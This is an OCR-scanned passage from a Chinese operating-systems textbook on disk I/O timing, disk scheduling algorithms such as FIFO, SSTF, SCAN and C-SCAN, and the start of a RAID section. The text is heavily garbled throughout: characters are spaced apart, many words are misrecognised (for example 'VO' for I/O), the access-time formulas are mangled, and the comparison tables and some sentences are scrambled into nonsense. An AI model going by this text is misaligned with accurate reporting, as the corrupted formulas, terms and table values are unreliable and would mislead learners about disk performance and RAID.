将 会 被 填 满 ， 进 程 在 处 理 完 每 一 大 块 数据 后 不 得 不 等 待 。 但 是 , 在 多 道 程序 设计 环境 中 ， 当 存在 
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多 种 WO 活动 和 多 种 进程 活动 时 ， 缓 冲 是 提高 操作 系统 效率 和 单个 进程 性 能 的 一 种 方法 。 


115 磁盘 调度 


在 过 去 的 40 年 中 ， 处 理 器 速度 和 内 存 速度 的 提高 远 远 超过 了 磁盘 访问 速度 的 提高 ， 处 理 器 
和 内 存 的 速度 提高 了 两 个 数量 级 , 而 磁盘 访问 的 速度 只 提高 了 一 个 数量 级 。 其 结果 是 当前 磁盘 的 
速度 比 内 存 至 少 慢 了 4 个 数量 级 , 这 个 差距 在 可 见 的 未 来 仍 将 继续 存在 。 因 此 , 磁盘 存储 子 系统 
的 性 能 是 至 关 重要 的 , 当前 有 许多 研究 都 致力 于 如 何 提高 其 性 能 。 本 节 着 重 论述 一 些 关键 问题 和 
最 重要 的 方法 。 由 于 磁盘 系统 的 性 能 与 文件 系统 的 设计 间 题 紧密 相关 ， 因 此 将 在 第 12 章 继续 进 


行 这 方面 的 论述 。 
— 3 一 


+ 一 设备 位 一 > 


图 11.6 磁盘 IO 传送 的 时 序 


i 


11.5.1 磁盘 性 能 参数 


磁盘 IO 的 实际 操作 细节 取决 于 计算 机 系统 、 操 作 系 统 以 及 VO 通道 和 磁盘 控制 器 硬件 的 特 
性 。 图 11.6 给 出 了 磁盘 IO 传送 的 一 般 时 序 图 。 

当 磁盘 驱动 器 工作 时 , 磁盘 以 一 种 恒定 的 速度 旋转 。 为 了 读 或 写 , 磁头 必须 定位 于 指定 的 磁 
” 道 和 该 磁道 中 指定 的 扇 区 的 开始 处 e 。 磁道 选择 包括 在 活动 头 系统 中 移动 磁头 或 者 在 固定 头 系统 
中 电子 选择 一 个 磁头 。 在 活动 头 系统 中 ,磁头 定位 到 磁道 所 需要 的 时 间 称 做 寻 道 时 间 ( seek time )。 
在 任何 一 种 情况 下 ， 一 旦 选择 好 磁道 ， 磁 盘 控制 器 就 开始 等 待 ， 直 到 适当 的 扇 区 旋转 到 磁头 处 。 
磁头 到 达 扇 区 开始 位 置 的 时 间 称 做 旋转 延迟 (rotational delay )。 寻 道 时 间 ( 如 果 有 的 话 ) 和 旋转 
延迟 的 总 和 为 存 取 时 间 (access time )， 这 是 达到 读 或 写 位置 所 需要 的 时 间 。 一 旦 磁头 定位 完成 ， 
磁头 就 通过 下 面 旋转 的 遍 区 , 开始 执行 读 操作 或 写 操作 , 这 正 是 操作 的 数据 传送 部 分 。 传 输 所 需 
的 时 间 是 传送 时 间 ( transfer time )。 

除了 存 取 时 间 和 传送 时 间 之 外 ,一 次 磁盘 IO 操作 通常 还 会 有 一 些 排队 延迟 。 当 进程 发 出 一 
个 VO 请 求 时 , 它 必须 首先 在 一 个 队列 中 等 待 该 设备 可 用 。 在 合适 的 时 候 , 该 设备 被 分 配给 这 个 
进程 。 如 果 该 设备 与 其 他 磁盘 驱动 器 共享 一 个 IO 通道 或 一 组 VO 通道 ,还 可 能 需要 额外 的 等 待 
时 间 ， 直 到 该 通道 可 用 。 在 这 之 后 才 开 始 访问 磁盘 。 

在 一 些 高 端 服务 器 系统 中 ， 使 用 了 一 种 称 做 旋转 定位 感知 (Rotational Positional Sensing, 
RPS) 的 技术 。 具 体 工作 流程 如 下 : 当 发 出 一 个 寻 道 命令 时 , 通道 被 释放 以 处 理 其 他 的 VO 操作 ; 
当 寻 道 完成 后 , 设备 确定 何 时 数据 旋转 到 磁头 下 面 ; 当 该 扇 区 接近 磁头 时 ， 这 个 设备 试图 重新 建 
立 到 主机 的 通信 和 路径， 如果 控制 单元 或 通道 正在 忙于 处 理 另 一 个 WO， 则 重新 连接 的 尝试 失败 ， 
设备 必须 旋转 一 周 ， 然 后 才 可 以 再 次 尝试 重新 连接 ， 这 称 做 一 次 RPS 失败 。 这 也 是 个 额外 延迟 ， 
其 必须 添加 到 图 11.6 中 的 时 间 线 上 。 

寻 道 时 间 

寻 道 时 间 是 将 磁头 辟 移 到 指定 磁道 所 需要 的 时 间 。 事实 证 明 这 个 时 间 很 难 减少 。 寻 道 时 间 由 

两 个 重要 部 分 组 成 : 最 初 启动 时 间 以 及 一 旦 访问 辟 到 达 一 定 速度 , 横 跨 那 些 它 必须 跨越 的 磁道 所 


O 关于 磁盘 组 织 和 格式 化 的 讨论 ， 请 参阅 附录 11A。 
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需要 的 时 间 。 遗憾 的 是 ,， 横 蜂 磁 道 的 时 间 不 是 关于 磁道 数目 的 线性 函数 ,其 还 包括 一 个 稳定 时 间 
( 从 磁头 定位 于 目标 磁道 直到 确认 磁道 标识 之 间 的 时 间 )。 

许多 提高 都 来 自 更 小 更 轻 的 磁盘 部 件 。 一 些 年 以 前 ,磁盘 直径 为 14 英寸 (36cm )， 而 如 今 
最 常见 的 大 小 为 3.5 英寸 ( 8.9cm ), 减少 了 磁头 璧 所 需 移动 的 距离 。 现 在 一 个 典型 的 硬盘 的 平均 
寻 道 时 间 小 于 10ms。 
旋转 延迟 

旋转 延迟 是 指 将 磁盘 的 待 访问 地 址 区 域 旋转 到 读 / 写 磁头 可 访问 的 位 置 所 需要 的 时 间 。 是 磁 
盘 ， 而 不 是 软盘 ， 其 旋转 速度 从 3600rm ( 对 于 手持 设备 ， 如 数码 相机 ) 到 15000r/m。 以 后 者 
为 例 ，15 000r/m 相当 于 每 4ms 旋转 一 周 。 因 此 ， 在 此 速度 下 ,平均 旋转 延迟 为 2ms。 软 盘 的 转 
速 通常 在 300r/m 到 600r/m 之 间 ， 因 而 其 平均 延迟 在 50ms 到 100ms 之 间 。 
传送 时 间 

入 磁盘 传送 或 从 磁盘 传送 的 时 间 取 决 于 磁盘 的 旋转 速度 ， 并 以 如 下 公式 表示 : 

b 

57N 
EF, TARERE, b 表示 要 传送 的 字 节 数 ，N 表示 一 个 磁道 中 的 字 节 数 ，r 表示 旋转 速度 ， 
单位 为 rs ( 转 / 秒 )。 

因此 ， 总 的 平均 存 取 时 间 可 以 表示 成 : 

1 b 


Ta =T; +—+— 
2r rN 


T 


其 中 ，T, 为 平均 寻 道 时 间 。 


Py Fe bk Se 
通过 前 面 定 义 的 参数 , 现在 考虑 两 种 不 同 的 IO 操作, 来 说 明 依 赖 平 均值 的 危险 性 。 考 虑 一 
个 典型 的 磁盘 ， 平 均 寻 道 时 间 为 4ms， 转 速 为 7500 rm， 每 个 磁道 有 500 TREK, BABE 512 
个 字 节 。 假设 读 取 一 个 包含 2500 AAR, ADA 1.28MB 的 文件 。 下 面 估 计 传 送 需 要 的 总 时 间 。 
首先 , 假设 文件 尽 可 能 紧凑 地 保存 在 磁盘 上 , 也 就 是 说 , 文件 占据 了 5 个 相 邻 磁道 中 的 所 有 
扇 区 (5 个 磁道 x 500 个 扁 区 /磁道 =2500 个 扇 区 )， 这 就 是 通常 所 说 的 顺序 组 织 。 现 在 ， 读 第 一 
个 磁道 的 时 间 如 下 : 
平均 寻 道 4ms 
旋转 延迟 4ms 
i 500 +X 8ms 
16ms 
假设 现在 可 以 不 需要 寻 道 时 间 而 读 取 其 余 的 磁道 ， 也 就 是 说 ，LO 操作 可 以 跟 得 上 来 自 磁盘 
的 数据 流 。 那 么 ， 最 多 需要 为 随后 的 每 个 磁道 处 理 旋转 延迟 。 因 此 ， 后 面 的 每 个 磁道 可 以 在 4 十 
8 二 12ms 内 读 人 。 为 读 取 整 个 文件 
总 时 间 二 16 十 (4 x 12)= 64ms 一 0.064s 
现在 来 计算 在 随机 访问 的 情况 下 (不 是 顺序 访问 的 情况 下 ) 读 取 相同 的 数据 所 需要 的 时 间 ， 
也 就 是 说 ， 对 扁 区 的 访问 随机 分 布 在 磁盘 上 。 对 每 个 扁 区 ， 可 以 得 到 : 
平均 寻 道 4ms 
旋转 延迟 4ms 
读 工 个 扇 区 0.016ms 
8.016ms 
FART [A] = 2500 x 8.016 =20040 ms=20.04 s 
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显然 ， 从 磁盘 读 扇 区 的 顺序 对 VO 的 性 能 有 很 大 的 影响 。 在 文件 访问 需要 读 或 写 多 个 扇 区 
的 情况 下 ， 我 们 可 以 对 数据 使 用 扇 区 的 方式 进行 一 定 的 控制 ,第 12 章 将 会 讲述 到 一 些 有 关 这 
方面 的 内 容 。 然 而 ， 即 使 在 访问 一 个 文件 的 情况 下 , 在 多 道 程序 环境 中 ， 也 会 出 现 IO 请 求 竞 
争 同 一 个 磁盘 的 情况 。 因 此 ， 在 完全 随机 访问 磁盘 上 ， 分 析 可 以 提高 磁盘 IO 性 能 的 途径 是 非 
常 值得 的 。 


11.5.2 ”磁盘 调度 策略 Animation: Disk Scheduling Moor 

在 前 面 所 述 的 例子 中 , 产生 性 能 差异 的 原因 可 以 追溯 到 寻 道 时 间 。 如 果 扇 区 访问 请 求 包 括 随 
机 选择 磁道 ， 磁 盘 IO 系统 的 性 能 会 非常 低 。 为 提高 性 能 ， 需 要 减少 花费 在 寻 道 上 的 时 间 。 

考虑 一 种 在 多 道 程序 环境 中 的 典型 情况 , 操作 系统 为 每 个 VO 设备 维护 一 条 请 求 队 列 。 因 此 
对 一 个 磁盘 ， 队 列 中 可 能 有 来 自 多 个 进程 的 许多 VO 请 求 ( 写 和 读 )。 如 果 随 机 地 从 队列 中 选择 
WA, 那么 磁道 完全 是 被 随机 访问 的 , 这 种 情况 下 的 性 能 最 差 。 随 机 调度 可 用 于 与 其 他 技术 进行 
对 比 ， 以 评估 这 些 技 术 。 

图 11.7 比较 了 不 同调 度 算法 对 LO 请 求 序列 的 性 能 表现 。 垂 直 轴 表示 磁盘 上 的 磁道 。 水 平 
轴 表 示 时 间或 等 价 的 跨越 磁道 的 数目 。 在 这 个 例子 中 , 假设 磁盘 有 200 个 磁道 , 磁盘 请 求 队列 中 
是 一 些 随机 请 求 。 被 请 求 的 磁道 ,按照 磁盘 调度 程序 接收 顺序 分 别 为 55、58、39、18、90、160、 
150、38、184。 表 11.2a 给 出 了 相应 的 结果 。 


表 11.2 磁盘 调度 算法 的 比较 
c) SCAN d) C-SCAN 


a)FIFO b> SSTF (从 磁道 100 处 开始 ， 沿 磁 | (从 磁道 100 处 开始 ， 沿 磁 
( 道 100 ) ( 道 100 ) » H s X 
从 磁道 100 处 开始 从 磁道 100 处 开始 道 号 增 大 的 顺序 ) 道 号 增 大 的 顺序 ) 

























下 一 个 被 访 模 跨 的 | 下 一 个 被 访 横 跨 的 | 下 一 个 被 访 MBH | 下 一 个 被 访 BE BS AO 

问 的 磁道 磁道 数 | 问 的 磁道 磁道 数 | 问 的 磁道 磁道 数 | 问 的 磁道 磁道 数 
55 45 90 10 150 50 150 50 
58 3 58 32 160 10 160 10 
39 19 55 3 184 24 184 24 
18 21 39 16 90 94 18 166 
90 72 38 1 58 32 38 20 
160 70 18 20 55 3 39 1 
150 10 150 132 39 16 55 16 
38 112 160 10 38 1 58 3 
184 146 184 24 18 20 90 32 








平均 寻 道 长 度 55.3 平均 寻 道 长 度 27.5 平均 寻 道 长 度 27.8 平均 寻 道 长 度 35.8 


先进 先 出 〈FIFO ) 

最 简单 的 调度 是 先进 先 出 (FIFO) 调度 ， 它 按 顺 序 处 理 队 列 中 的 项 目 。 这 个 策略 具有 公平 
的 优点 ， 因 为 每 个 请 求 都 会 得 到 处 理 ， 并且 是 按照 接收 到 的 顺序 进行 处 理 的 。 图 11.7a 显示 了 磁 
头 辟 以 FIFO 策略 移动 的 情况 。 该 图 由 表 11.2a 中 的 数据 直接 生成 。 可 以 看 到 ， 磁 盘 的 访问 顺序 
和 请 求 被 最 初 接收 到 的 顺序 是 一 致 的 。 

使 用 FIFO ， 如 果 只 有 一 些 进程 需要 访问 ， 并 且 如 果 大 多 数 请 求 都 是 访问 艇 聚 的 文件 扇 区 ， 
则 有 望 达到 较 好 的 性 能 。 但 是 ， 如 果 有 大 量 进程 竞争 一 个 磁盘 ,这 种 技术 在 性 能 上 往往 接近 于 
随机 调度 。 因 此 ， 需 要 考虑 一 些 更 复杂 的 调度 策略 。 表 11.3 列 出 了 许多 这 类 策略 ,下面 将 分 
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别 讲述 。 





a) FIFO 





时 间 
b) SSTF 


磁道 号 





时 间 
c) SCAN 


磁道 号 





时 间 
d) C-SCAN 


图 11.7 ”磁盘 调度 算法 比较 ( 见 表 11.3 ) 


#13 磁盘 调度 算法 


名 称 说 AR 注 FE 
根据 请 求 者 选择 











随机 调度 
先进 先 出 
进程 优先 级 
后 进 先 出 


用 于 分 析 和 模拟 
最 公平 的 调度 
在 磁盘 队列 管理 之 外 控制 

局 部 性 最 好 ， 资 源 的 使 用 率 最 高 
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( & ) 


名 称 说 AR 注 # 





根据 被 请 求 项 选择 














SSTF 最 短 服务 时 间 优 先 
SCAN 在 磁盘 上 往复 


使 用 率 高 ， 队 列 小 
服务 分 布 比较 好 


C-SCAN 一 条 道路 ,快速 返回 服务 变化 较 低 
N-step-SCAN 一 次 N 个 记录 的 SCAN 服务 保证 
FSCAN N-step-SCAN, N= SCAN 循环 开始 处 | 负载 敏感 





的 队列 大 小 使 用 率 
优先 级 

对 于 基于 优先 级 (PRI ) 的 系统 ， 有 关 调 度 的 控制 在 磁盘 管理 软件 的 控制 之 外 。 这 种 方法 并 
不 会 优化 磁盘 的 使 用 率 , 但 可 以 满足 操作 系统 的 其 他 目标 。 通 常 比较 短 的 批 作 业 和 交互 作业 的 优 
先 级 较 高 ,而 较 长 计算 时 间 的 长 作业 的 优先 级 较 低 。 这 就 使 得 大 量 的 短 作 业 能 够 迅速 地 通过 系统 ， 
并 且 可 以 提供 比较 好 的 交互 响应 时 间 。 但 是 , 长 作业 可 能 不 得 不 等 待 过 长 的 时 间 。 此 外 , 这 种 策 
略 可 能 会 导致 部 分 用 户 采 用 对 抗 手 段 :把 作业 分 成 小 块 以 应 对 系统 的 这 种 策略 .对 于 数据 库 系 统 ， 
这 类 策略 往往 导致 性 能 较 差 。 


后 进 先 出 

令 人 惊讶 的 是 ,这 种 选取 最 近 请 求 的 策略 有 许多 优点 。 在 事务 处 理 系统 中 , 把 设备 资源 提供 
给 最 近 的 用 户 , 会 导致 磁头 辟 在 一 个 顺序 文件 中 移动 时 移动 得 很 少 , 其 至 不 移动 。 利 用 这 种 局 部 
性 可 以 提高 吞吐 量 , 减 小 队列 长 度 。 只 要 一 个 作业 积极 地 使 用 文件 系统 , 它 就 可 以 尽 可 能 快 地 得 
到 处 理 。 但 是 ,如 果 由 于 工作 量 大 而 使 磁盘 保持 忙 状态 , 就 有 可 能 出 现 饿 死 的 情况 。 当 一 个 作业 
已 经 往 队 列 中 送 入 一 个 VO 请 求 , 并 且 错 过 了 可 以 提供 服务 的 位 置 时 , 该 作业 就 有 可 能 永远 得 不 
到 服务 ， 除 非 它 前 面 的 队列 变 为 空 。 

FIFO、 优 先 级 和 LIFO ( 后进 先 出 ) 调度 都 仅仅 基于 队列 或 请 求 者 的 属性 。 如 果 调 度 程序 知 
道 当 前 磁道 位 置 ， 就 可 以 采用 基于 被 请 求 项 的 调度 策略 。 下 面 将 分 析 这 些 策略 。 
最 短 服务 时间 优先 

SSTF 策略 选择 使 磁头 臂 从 当前 位 置 开 始 移动 最 少 的 磁盘 LO 请 求 。 因 此 ,SSTF 策略 总 是 选 
， 择 导致 最 小 寻 道 时 间 的 请 求 。 当然, 总 是 选择 最 小 寻 道 时 间 并 不 能 保证 平均 寻 道 时 间 最 小 , 但 是 ， 
它 能 提供 比 FIFO 更 好 的 性 能 。 由 于 磁头 辟 可 以 沿 两 个 方向 移动 ， 因 此 可 以 使 用 一 种 随机 选择 算 
法 解决 距离 相等 的 情况 。 

a 11.7b 和 表 11.2b 显示 了 与 前 面 FIFO 使 用 同一 个 例子 的 SSTF 性 能 。 第 一 个 被 访问 的 磁道 
是 90， 因 为 该 磁道 是 距离 起 始 位 置 最 近 的 被 请 求 磁 道 。 下 一 个 被 访问 的 磁道 是 58， 因 为 它 是 剩 
余 的 请 求 中 距离 当前 位 置 ( 磁道 90 ) 中 距离 最 近 的 磁道 。 后 面 的 访问 磁道 的 选择 也 与 此 类 似 。 


SCAN 

除了 FIFO， 到 此 为 止 描 述 的 所 有 策略 都 可 能 使 某 些 请 求 直 到 整个 队列 为 空 时 才 可 以 完成 。 
也 就 是 说 , 可 能 总 有 新 请 求 到 达 , 并 且 其 在 队列 中 已 存在 的 请 求 之 前 被 选择 。 为 避免 出 现 这 类 饥 
饿 的 情况 ,一 种 比较 简单 的 方法 是 SCAN ( 扫描 ) 算法 。 由 于 其 运行 跟 电梯 类 似 ， 因 此 也 被 称 为 
电梯 算法 。 

SCAN 要 求 磁 头 臂 仅 沿 一 个 方向 移动 , 并 在 途中 满足 所 有 未 完成 的 请 求 , 直到 它 到 达 这 个 方 
向 上 的 最 后 一 个 磁道 ， 或 者 在 这 个 方向 上 没有 别 的 请 求 为 止 ， 后 一 种 改进 有 时 候 称 做 LOOK 策 
路 。 接 着 反 转 服务 方向 ， 沿 相反 方向 扫描 ， 同 样 按 顺序 完成 所 有 请 求 。 

图 11.7c AIR 11.2c 说 明了 SCAN 策略 。 假 设 最 初 的 方向 是 磁道 序号 递增 的 方向 ， 则 第 一 个 
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选择 的 磁道 就 是 150， 因 为 该 磁道 是 递增 方向 上 距离 磁道 100 最 近 的 磁道 。 

可 以 看 出 ，SCAN 策略 的 行为 和 SSTF 策略 非常 类 似 。 实 际 上 ， 如 果 在 例子 开始 时 ， 假设 磁 
头 辟 沿 着 磁道 号 减 小 的 方向 移动 , 那么 SSTF 和 SCAN 的 调度 方式 是 相同 的 。 但 这 仅仅 是 一 个 静 
态 的 例子 , 队列 在 这 期 间 不 会 增加 新 的 请 求 。 甚 至 当 队 列 动态 变化 时 , 除非 请 求 模式 不 符合 常规 ， 
否则 SCAN 仍然 类 似 于 SSTF。 

注意 ，SCAN 策略 对 最 近 横 跨 过 的 区 域 不 公平 ， 因 此 ， 它 在 开发 局 部 性 方面 不 如 SSTF 和 
LIFO 好 。 

不 难看 出 , SCAN 策略 偏爱 那些 请 求 接近 最 靠 里 或 最 靠 外 的 磁道 的 作业 , 并 且 偏 爱 最 近 的 作 
业 。 第 一 个 问题 可 以 通过 C-SCAN 策略 得 以 避免 ,第 二 个 问题 可 以 通过 N-step-SCAN 策略 解决 。 
C-SCAN 

C-SCAN ( 循环 SCAN ) 策略 把 扫描 限定 在 一 个 方向 上 。 因 此 ， 当 访问 到 沿 某 个 方向 的 最 后 一 
个 磁道 时 ， 磁 头 臂 返回 到 磁盘 相反 方向 磁道 的 末端 ， 并 再 次 开始 扫描 。 这 就 减少 了 新 请 求 的 最 大 
延迟 。 对 于 SCAN, ， 如 果 从 最 里 面 的 磁道 扫描 到 最 外 面 的 磁道 的 期 望 时 间 为 + 则 这 个 外 设 上 的 扁 
区 的 期 望 服务 间隔 为 2。 而 对 于 C-SCAN ， 这 个 间隔 大 约 为 tsm FEP smox 是 最 大 寻 道 时 间 。 

图 11.74 和 表 11.2d 说 明了 C-SCAN 的 行为 。 在 这 个 例子 中 ， 最 先 访问 的 三 个 被 请 求 的 磁道 
Æ 150, 160 和 184。 然 后 从 磁道 编号 最 小 处 开始 扫描 ， 接 下 来 访问 的 磁道 是 18。 


N-step-SCAN 和 FSCAN 

对 于 SSTF、SCAN 和 C-SCAN ， 磁 头 臂 可 能 在 一 段 很 长 的 时 间 内 不 会 移动 。 例 如 ， 如 果 一 
个 或 多 个 进程 对 一 个 磁道 有 较 高 的 访问 速度 时 ,它们 可 以 通过 重复 地 请 求 这 个 磁道 以 垄断 整个 设 
备 。 高 密度 多 面 磁盘 比 低 密 度 磁 盘 以 及 单 面 或 双 面 磁盘 更 容易 受 这 种 特性 的 影响 。 为 避免 这 种 “ 磁 
头 辟 的 粘性 ”， 磁 盘 请 求 队列 被 分 成 段 ， 一 次 只 有 一 段 被 完全 处 理 。 这 种 方法 的 两 个 例子 是 
N-step-SCAN (NN 步 扫 描 ) 和 FSCAN。 

N-step-SCAN 策略 把 磁盘 请 求 队列 分 成 长 度 为 N 的 子 队 列 ， 每 一 次 用 SCAN 处 理 一 个 子 队 
列 。 在 处 理 某 一 个 队列 时 ,新 请 求 必须 添加 到 其 他 某 个 队列 中 。 如 果 在 扫描 的 最 后 剩 下 的 请 求 数 
小 于 NN， 则 它们 全 都 将 在 下 一 次 扫描 时 处 理 。 对 于 比较 大 的 N 值 ，N-step-SCAN 的 性 能 与 SCAN 
接近 ; 当 N=I it, KREME FIFO, 

FSCAN 是 一 种 使 用 两 个 子 队 列 的 策略 。 当 扫描 开始 时 ， 所 有 请 求 都 在 一 个 队列 中 ， 而 另 一 
个 队列 为 空 。 在 扫描 过 程 中 ,所 有 新 到 的 请 求 都 被 放 人 另 一 个 队列 中 。 因 此 ,对 新 请 求 的 服务 延 
迟到 处 理 完 所 有 老 请 求 之 后 。 


1 1 6 RAID Animation: ee 

前 面 曾 经 提 到 过 , 辅 存 性 能 的 提高 速度 远 远 低 于 处 理 器 和 内 存 性 能 的 提高 速度 , 这 种 不 匹配 
使 得 磁盘 存储 系统 可 能 成 为 提高 整个 计算 机 系统 性 能 的 主要 问题 。 

和 计算 机 性 能 的 其 他 领域 一 样 , 磁盘 存储 器 的 设计 者 认识 到 , 如 果 使 用 一 个 组 件 对 性 能 的 影 
WAR, 那么 可 以 通过 使 用 多 个 并 行 的 组 件 来 获得 额外 的 性 能 提高 。 在 磁盘 存储 器 的 情况 下 , 这 
就 导致 了 独立 并 行 运行 的 磁盘 阵列 的 开发 。 通过 多 个 磁盘 ,多 个 独立 的 IO 请 求 可 以 并 行 地 进行 
处 理 ， 只 要 它们 所 需要 的 数据 驻 留 在 不 同 的 磁盘 中 。 此 外 ,如果 要 访问 的 数据 块 分 布 在 多 个 磁盘 
E, VO 请 求 也 可 以 并 行 地 执行 。 

在 使 用 多 个 磁盘 时 ， 有 很 多 种 方法 可 以 用 于 组 织 数据 , 并 且 可 以 通过 增加 元 余 度 来 提高 可 靠 
性 。 这 就 导致 难以 开发 在 多 个 平台 和 操作 系统 中 均 可 使 用 的 数据 库 方案 。 幸 好 , 关于 多 磁盘 数据 
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库 设 计 已 形成 了 一 个 标准 方案 ， 称 做 独立 磁盘 元 余 阵 列 (Redundant Array of Independent Disks, 
RAID )。RAID 方案 包括 7 TRAIL, A 0 到 6。 这 些 级 别 并 不 隐 舍 一 种 层次 关系 ， 但 它们 表明 
了 不 同 的 设计 体系 结构 ， 这 些 设计 体系 结构 有 三 个 共同 的 特性 : 

1) RAID 是 一 组 物理 磁盘 驱动 器 ， 操 作 系统 把 它 看 做 是 一 个 单个 的 逻辑 驱动 器 。 

2) 数据 分 布 在 物理 驱动 器 阵列 中 ， 这 种 设计 称 为 条 带 化 ， 将 在 后 面 详 述 。 

3) 使 用 宛 余 的 磁盘 容量 保存 奇偶 检验 信息 ， 从 而 保证 当 一 个 磁盘 失效 时 ， 数 据 具 有 可 恢复 性 。 

不 同 的 RAID 级 别 中 ， 第 二 个 特性 和 第 三 个 特性 的 细节 不 同 ; RAIDO 和 RADI 不 支持 第 三 
个 特性 。 

术语 RAID 最 初 是 在 加 利 福 尼 亚 大 学 伯克利 分 校 的 一 个 研究 小 组 的 论文 中 提出 的 [ PATT88 JO 
这 篇 论文 概述 了 各 种 RAID 配置 和 应 用 ,并 提出 了 RAID 各 级 别 的 定义 ,这 些 定义 一 直 沿 用 至 今 。 
RAID 策略 用 多 个 小 容量 驱动 器 代替 大 容量 磁盘 驱动 器 ,并 且 以 这 样 的 一 种 方式 分 布 数 据 ， 使 得 
能 同时 从 多 个 驱动 器 访问 数据 ， 因 而 提高 了 LO 的 性 能 ， 并 能 够 更 容易 地 增加 容量 。 

RAID 特有 的 贡献 是 有 效 地 解决 了 对 宛 余 的 要 求 。 尽 管 RAD 允许 多 个 磁头 和 动 臂 机 构 同时 
操作 ， 以 达到 更 高 的 IO 速度 和 数据 传送 率 , 但 使 用 多 个 设备 增加 了 失败 的 可 能 性 。 为 补偿 这 种 
可 靠 性 的 降低 ，RAID 通过 存储 奇偶 校 验 信息 使 得 能 够 从 一 个 磁盘 的 失败 中 恢复 所 丢失 的 数据 。 

下 面 分 析 RAID 的 每 一 个 级 别 。 表 11.4 大 致 总 结 了 RAID 的 7 个 级 别 。 其 中 ，LO 的 性 能 是 
以 下 面 两 种 能 力 表示 的 : 数据 传送 能 力 或 移动 数据 的 能 力 和 LO 请 求 率 或 VO 请 求 的 完成 能 力 ， 
这 是 因为 RAID 不 同 级 别 之 间 的 性 能 差别 主要 表现 在 这 两 种 能 力 上 。RAID 不 同 级 别 的 优点 都 以 
粗 体 表示 。 图 11.8 给 出 了 一 个 例子 ,说 明了 分 别 使 用 7 种 RAD 方案 ,在 没有 元 余 的 情况 下 需 
要 4 个 磁盘 的 数据 容量 。 该 图 强调 了 用 户 数据 和 宛 余数 据 的 布局 , 表明 了 不 同 级 别 之 间 的 相对 在 
储 需 求 。 在 下 面 的 论述 中 自始至终 都 要 用 到 该 图 。 


表 11.4 RAID 级 别 

































































MO 
级 别 说 明 磁盘 请 求 数据 可 用 性 大 WO 数据 量 传 | ”小 Ja 请 求 率 
输 能 力 
低 于 单个 磁盘 读 和 写 都 很 高 
读 时 最 快 可 以 
读 时 高 于 单个 
高 于 RAID2、3、 为 单个 磁盘 的 两 
镜像 1 被 镜像 2N | 4 或 5; 低 于 RAID6 inal fe, Bat sae 
盘 相 近 
日 6 个 
， 通过 汉 明码 实 | a 所 有 列 出 方案 | ”大概 是 单个 磁盘 
m sog » 
equa RATA 4 或 5 可 比 中 最 高 的 的 两 倍 
ITHE 
日 $ AN 
交错 位 奇偶 校 ABATA 所 有 列 出 方案 | ”大 概 是 单个 磁盘 
3 验 N+1 人 磁盘; 与 RAID2、 中 最 高 的 的 两 售 
4 或 5 可 比较 
明显 高 于 单个 读 时 与 RAIDO 读 时 与 RAID0 
独立 访问 4 eo 磁盘 ; 与 RAID2?、| 相近 ; 写 时 明显 | 相似 ; 写 时 明显 慢 
3 或 5 可 比较 慢 于 单个 磁盘 | 于 单个 磁盘 














加 “一些 研 究 人 员 和 公司 还 定义 了 一 些 额外 的 级 别 ， 但 本 节 所 描述 的 7 个 级 别 是 得 到 普遍 认可 的 。 

O 在 这 条 论文 中 , 首 字 母 缩写 RAID 代表 的 是 廉价 磁盘 宛 余 阵 列 (Redundant Array of Inexpensive Disk )。 术 语 廉 
价 (inexpensive ) 用 于 对 比 RAID 阵列 中 使 用 的 相对 比较 小 、 比 较 便 宜 的 磁盘 和 可 供 选 择 的 一 个 比较 大 、 比 较 
昂贵 的 磁盘 ( Single Large Expensive Disk, SLED )。SLED 已 经 过 时 了 ， 类 似 的 磁盘 技术 已 经 用 于 RAID AE 
RAID 配置 中 。 因 此 , 行业 采用 术语 独立 ( independent ) 来 强调 RAID 阵列 产生 的 显著 性 能 和 可 靠 性 。 


ZIU VO ŽE PRA IE 349 





( 续 ) 














大 MO 数据 量 传 































类 别 aly i 
数据 可 用 性 Ween |. VO 请 求 率 
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偶 校 验 磁盘 ; 与 RAID2、 相似 ; 写 时 通常 慢 
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独立 访问 
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所 有 列 出 方案 
中 最 高 的 





È: N= 数据 磁盘 数目 ; m 与 logN 成 正比 。 
11.6.1 RAID 级 别 0 


RAID 级 别 0 并 不 是 RAID 家 族 的 真正 成 员 ， 因 为 它 没 有 用 宛 余 数据 来 提高 性 能 。 但 是 ， 有 
许多 应 用 程序 ,比如 超级 计算 机 上 的 应 用 程序 , 都 采用 了 这 种 方式 。 超 级 计算 机 最 关注 的 是 性 能 
和 容量 ， 降 低 成 本 比 提高 可 靠 性 要 重要 得 多 。 

对 于 RAID 0， 用 户 数据 和 系统 数据 分 布 在 阵列 的 所 有 磁盘 中 。 这 上 比 使 用 单个 大 磁盘 有 显著 
的 优势 ; 当 两 个 不 同 的 IO 请 求 为 两 块 不 同 的 数据 挂 起 时 , 很 有 可 能 被 请 求 的 块 在 不 同 的 磁盘 上 ， 
因此 这 两 个 请 求 可 以 并 行 发 出 ， 从 而 减少 了 LO 排队 等 待 的 时 间 。 

但 是 RAID 0 和 所 有 的 RAID 级 别 一 样 ， 并 不 是 简单 地 把 数据 分 布 在 磁盘 阵列 中 ， 数据 成 条 
状 分 布 在 所 有 可 用 磁盘 中 。 通 过 图 11.8 可 以 很 容易 地 理解 这 一 点 。 所 有 用 户 数据 和 系统 数据 被 
看 做 是 存储 在 一 个 逻辑 磁盘 上 ,这 个 磁盘 被 划分 成 多 个 条 带 , 一 个 条 带 可 以 是 一 个 物理 块 、 扇 区 
或 别 的 某 种 单元 。 这 些 条 带 被 循环 映射 到 连续 的 阵列 成 员 中 。 一 组 逻辑 上 连续 的 条 带 ，, 如 果 恰 好 
一 个 条 带 映射 到 一 个 阵列 成 员 上 , 则 称 它们 为 一 条 条 带 。 在 一 个 n 磁盘 阵列 中 , 最 初 的 n ER 
条 带 被 保存 在 ”个 磁盘 中 每 个 磁盘 的 第 一 个 条 带 中 , 从 而 形成 了 第 一 个 条 带 ; 接 下 来 的 个 条 带 
被 分 成 在 每 个 磁盘 的 第 二 个 条 带 中 ,以 此 类 推 。 这 种 布局 的 优点 是 ， 如 果 一 个 WO 请 求 由 多 个 逻 
辑 上 连续 的 条 带 组 成 ， 该 请 求 可 以 并 行 处 理 ， 大 大 地 减少 了 VO 传送 时 间 。 

RAID 0 实现 高 数据 传送 能 力 

任何 一 个 RAID 级 别 的 性 能 取决 于 主机 系统 的 请 求 模式 和 数据 的 布局 ， 这 些 问题 在 RAID 0 
可 以 得 到 最 明确 的 解决 ， 因 为 在 RAID 0 中 ,不 会 由 于 元 余 性 的 影响 对 分 析 产 生 干 扰 。 首 先 ， 考 
